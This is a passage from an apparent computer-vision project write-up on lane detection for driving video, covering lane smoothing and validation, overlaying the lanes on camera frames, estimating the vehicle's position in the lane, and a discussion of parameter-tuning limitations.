for each lane in each frame, evaluated at the bottom of the frame. It was found that the measurement was quite sensitive and noisey and perhaps not reliable using this approach.\n\n## Transforming back to the camera view and pipelining to overlay on a video\n\nBefore bringing the lane polynomial fits back to the image, some lane validation and smoothing steps are performed. Every lane position is the average of the last 10 positions, which mediates jumping lane lines. There are also requirements to check that the lanes are roughly parallel and of an acceptable width. If these requirements are not met, the lane lines take on the those of the last good lane tracks.\n\n\nOnce lanes are verified, they warped back to the camera view and overlayed on top of the original image. From here, assuming a lane width of 3.7 meters, we can also determine the position of the vehicle laterally within the lane. Here, positive means to the right of the center.\n\n![alt text][overlaid]\n\nThese steps are then placed in a pipeline and used to produce the above video\n\n## Discussion\n\nThis approach doesn't require much data since there is no model to train but the manual tuning of parameters is tedious and only through many iterations and exposure to different driving conditions can a good set of parameters be found. Even then there's no measurement of how well the parameters work on a wide array of videos. Tuning them on only one or two videos certainly won't be robust.\n\nImprovement can be had at the binary transforms section by doing some weighted average not at the binary level but at the transformed level. For example, each value of saturation will have a high confidence level based on closely within the parameters and if the same pixels are also within a good range with respect to the Sobel transforms then it can be of higher confidence. The polynomial fit can then be weighted using the confidence of these pixels.\n\nThere was not testing for night time videos so that require more tuning or even a seperate set of parameters. In embedded systems, such added complexity will be weighed against limited device processing power, especially since the device will be busy with other tasks as well. This approach seems to be computationally expensive, with the many transforms involved.\n"
}
] | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.